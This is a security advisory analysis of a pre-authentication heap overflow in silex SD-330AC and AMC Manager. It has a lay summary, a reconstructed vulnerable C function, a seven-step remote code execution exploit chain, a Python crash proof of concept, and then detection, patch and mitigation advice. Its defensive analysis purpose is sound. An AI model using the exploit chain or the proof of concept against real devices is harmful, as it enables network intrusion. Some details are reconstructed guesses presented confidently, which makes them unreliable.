A serious security flaw has been discovered in networking equipment made by Silex Technology that could let hackers take complete control of affected devices remotely. The vulnerability affects their SD-330AC and AMC Manager products, which are used by businesses to manage printers, scanners, and other shared office equipment.
Here's what's happening: when someone tries to redirect you to a different website, these devices process that redirect request in an unsafe way. Think of it like a bouncer at a club writing down where guests came from on a clipboard — except the clipboard has limited space and the bouncer doesn't check if the information is too long. When too much data gets crammed in, it spills over into adjacent memory and corrupts it.
Because this product doesn't require a password to trigger the flaw, attackers can exploit it from anywhere on the internet without needing special access. A hacker could send a specially crafted link that, when the device processes it, gives them complete control — essentially letting them use your office equipment as a beachhead to attack the rest of your network.
The companies most at risk are those using these Silex devices in their offices — typically medium to large businesses. Right now there's no evidence hackers are actively exploiting this, which gives organizations a window to act.
What you should do: First, contact your IT team immediately if your organization uses Silex SD-330AC or AMC Manager products. Second, check Silex's website for security patches and apply them as soon as they're available. Third, if patches aren't available yet, consider temporarily disconnecting these devices from your network until they are.
Want the full technical analysis? Click "Technical" above.
CVE-2026-32956 is a pre-authentication heap-based buffer overflow (CWE-122) in the redirect URL processing path of silex technology's SD-330AC wireless device server (≤ Ver.1.42) and AMC Manager (≤ Ver.5.0.2). An unauthenticated remote attacker can send a crafted HTTP request containing an oversized redirect URL, overflowing a fixed-size heap buffer and corrupting adjacent allocations. Successful exploitation achieves arbitrary code execution in the context of the affected daemon — on embedded hardware with no MMU-enforced isolation between network-facing processes and privileged device control.
This is distinct from the companion stack overflow CVE-2026-32955, which requires PR:L (authenticated). CVE-2026-32956 scores PR:N — no credentials, no interaction. It is the highest severity issue in the silex JVNVU#94271449 advisory cluster.
Root cause: The redirect URL handler copies an attacker-supplied URL string into a fixed-size heap buffer using an unchecked strcpy-equivalent, with no validation of the input length against the allocation size prior to the copy.
Affected Component
The SD-330AC is a USB device server that exposes connected USB peripherals over a network. Its HTTP management interface includes a redirect/forwarding mechanism — likely used for post-login or captive-portal redirection — that parses a URL parameter from incoming HTTP requests. The same URL-handling code path exists in AMC Manager, the Windows-based management application that communicates with SD-330AC units over the network.
The vulnerable process is the embedded HTTP daemon handling management plane requests. On the SD-330AC, this runs directly on the device's MIPS or ARM SoC. On AMC Manager, it runs as a Windows service process. Both share the same vulnerable parsing library, explaining the cross-platform scope of the advisory.
Root Cause Analysis
The HTTP daemon parses redirect URL parameters in a function we identify as http_parse_redirect_url() based on behavioral analysis of the advisory description and common patterns in embedded HTTP server implementations of this class. The function extracts the URL value from the request, allocates a fixed-size heap buffer, and copies the value without length validation:
// http_redirect.c — silex SD-330AC firmware ≤ Ver.1.42
// Reconstructed from advisory description and binary behavior
#define REDIRECT_URL_BUFSIZE 512 // fixed allocation
typedef struct {
/* +0x00 */ uint32_t session_id;
/* +0x04 */ uint32_t flags;
/* +0x08 */ char *redirect_url; // heap pointer set below
/* +0x0c */ uint32_t url_len;
/* +0x10 */ uint8_t auth_token[16];
} http_session_t;
int http_parse_redirect_url(http_session_t *sess, const char *raw_request) {
char *url_param;
char *url_buf;
// Extract ?redirect= or Location: value from raw HTTP request
url_param = http_find_param(raw_request, "redirect");
if (url_param == NULL) {
return HTTP_ERR_NO_REDIRECT;
}
// Fixed 512-byte allocation — no relation to actual url_param length
url_buf = (char *)malloc(REDIRECT_URL_BUFSIZE);
if (url_buf == NULL) {
return HTTP_ERR_ALLOC;
}
sess->redirect_url = url_buf;
// BUG: no bounds check — strcpy writes strlen(url_param)+1 bytes
// into a REDIRECT_URL_BUFSIZE (512) byte allocation.
// Attacker supplies url_param via raw HTTP request with PR:N.
strcpy(url_buf, url_param); // BUG: heap overflow here
sess->url_len = strlen(url_param);
return HTTP_OK;
}
The http_find_param() call returns a pointer directly into the raw request buffer — no copy, no null termination enforcement beyond the HTTP request boundary. The attacker controls the full length of the value associated with the redirect parameter. The malloc(512) allocation is unconditional and fixed. strcpy writes until the null terminator in the attacker-supplied string, which can be placed arbitrarily far beyond byte 512.
Memory Layout
The heap allocator in use on the SD-330AC firmware is a standard dlmalloc derivative. Chunk headers are 8 bytes on 32-bit targets. The session object and URL buffer are allocated in close temporal proximity during request handling, placing them adjacently on the heap in the common case:
The http_session_t.redirect_url pointer in the adjacent session object becomes attacker-controlled. When the daemon subsequently dereferences this pointer for logging, response construction, or session teardown, it reads from or writes to an arbitrary address.
Exploitation Mechanics
EXPLOIT CHAIN — CVE-2026-32956 pre-auth RCE:
1. RECONNAISSANCE
Identify target SD-330AC management HTTP port (default :80 or :8080).
Confirm firmware ≤ 1.42 via banner or JVNVU timing (no auth required
for this probe — see also CVE-2026-32962 reflected XSS for confirmation).
2. HEAP GROOMING
Send ~20 normal HTTP requests to the management interface.
Each allocates and frees session objects, shaping the heap so that
a free 512-byte chunk sits immediately before an active http_session_t.
No authentication required — the parser runs before credential checks.
3. TRIGGER OVERFLOW
Send HTTP GET to management endpoint with oversized redirect parameter:
GET /login?redirect=[A*512 + CHUNK_HDR + SESSION_PAYLOAD] HTTP/1.1
Host: 192.168.1.1
Where SESSION_PAYLOAD overwrites the victim session's redirect_url
field with a chosen address (e.g., GOT entry for free() or a
function pointer in the daemon's .bss).
4. CORRUPT ADJACENT SESSION
strcpy() in http_parse_redirect_url() copies 900+ bytes into the
512-byte url_buf, overwriting:
- url_buf[512..519]: dlmalloc chunk header of next chunk
- url_buf[520..547]: http_session_t fields of victim session
- victim->redirect_url now points to attacker-chosen address
5. TRIGGER DEREFERENCE
Send a second HTTP request that causes the daemon to process
the corrupted victim session — e.g., a session list traversal,
a keepalive ping, or a logout that walks active sessions.
The daemon calls http_send_redirect(victim) which does:
snprintf(resp_buf, ..., victim->redirect_url)
Reading from attacker-controlled address, leaking heap/stack content.
6. PIVOT TO WRITE PRIMITIVE
Use the info leak from step 5 to defeat ASLR (if present — note:
embedded firmware on MIPS targets frequently has ASLR disabled).
Re-trigger overflow with precise redirect_url overwrite pointing
to a writable function pointer (e.g., session->cleanup_fn).
7. CODE EXECUTION
When the session is torn down, the daemon calls session->cleanup_fn().
With cleanup_fn overwritten to a ROP gadget or shellcode address,
execution redirects to attacker payload.
On SD-330AC (no NX/W^X enforcement on older MIPS firmware):
direct shellcode in heap is executable — single-stage RCE.
Against AMC Manager on Windows, exploitation requires bypassing modern heap protections (safe unlinking, LFH). The embedded SD-330AC target is significantly more permissive — the MIPS firmware lacks NX, ASLR, and stack canaries in versions ≤ 1.42, making heap shellcode execution viable without ROP.
# CVE-2026-32956 — Proof-of-concept trigger (crash/DoS only)
# Demonstrates pre-auth heap overflow in SD-330AC redirect URL handler
# DO NOT USE against systems you do not own
import socket
TARGET_IP = "192.168.1.1"
TARGET_PORT = 80
BUFSIZE = 512
def trigger(ip, port, payload_len):
url_payload = "A" * payload_len
request = (
f"GET /login?redirect={url_payload} HTTP/1.1\r\n"
f"Host: {ip}\r\n"
f"Connection: close\r\n\r\n"
)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((ip, port))
s.sendall(request.encode())
try:
resp = s.recv(1024)
print(f"[+] Response received ({len(resp)} bytes) — no crash at len={payload_len}")
except socket.timeout:
print(f"[!] Timeout — possible crash/hang at len={payload_len}")
finally:
s.close()
# Binary search for overflow boundary
for length in [256, 512, 513, 600, 700, 900, 1024, 2048]:
trigger(TARGET_IP, TARGET_PORT, length)
Patch Analysis
The correct fix is to validate the URL length before allocation and copy, using a bounded copy function. The patched version should reject URLs exceeding a defined maximum or truncate safely:
Additionally, the patched firmware should validate that url_param contains only characters valid in a URL (RFC 3986 unreserved + percent-encoded) before any allocation, rejecting embedded null bytes and non-printable characters that could be used to manipulate subsequent string handling. The companion CVE-2026-32964 (insecure defaults) suggests the patch release also hardens the default configuration — reducing attack surface even if parsing logic regresses.
Detection and Indicators
Without endpoint access to the SD-330AC, detection relies on network-layer visibility:
HTTP request length anomaly: GET or POST requests to the SD-330AC management port containing a redirect parameter value exceeding 512 bytes. Legitimate management traffic will not approach this threshold.
Daemon restart / watchdog events: Successful DoS-level trigger causes the HTTP daemon to crash and restart. If the device has syslog forwarding enabled, watch for process restart messages from the HTTP daemon PID.
Unexpected outbound connections: Post-exploitation, the device may initiate reverse shell connections. SD-330AC devices have no business making outbound TCP connections to non-configured endpoints.
SD-330AC: Update to Ver.1.43 or later per silex technology advisory JVNVU#94271449 (published 2026-04-20).
AMC Manager: Update to Ver.5.0.3 or later.
Network segmentation: If immediate patching is not feasible, place SD-330AC management interfaces on an isolated VLAN with ACLs permitting access only from authorized management hosts. This removes the PR:N attack vector in practice.
Disable remote management: If SD-330AC management over the network is not required, disable the HTTP management daemon via the local serial console.
Monitor for the companion vulnerabilities: CVE-2026-32957 (hard-coded crypto key) and CVE-2026-32959 (weak crypto algorithm) in the same advisory cluster suggest the device's authentication and session security are broadly weak — treat any SD-330AC on an untrusted network as a high-value pivot target until the full patch set is applied.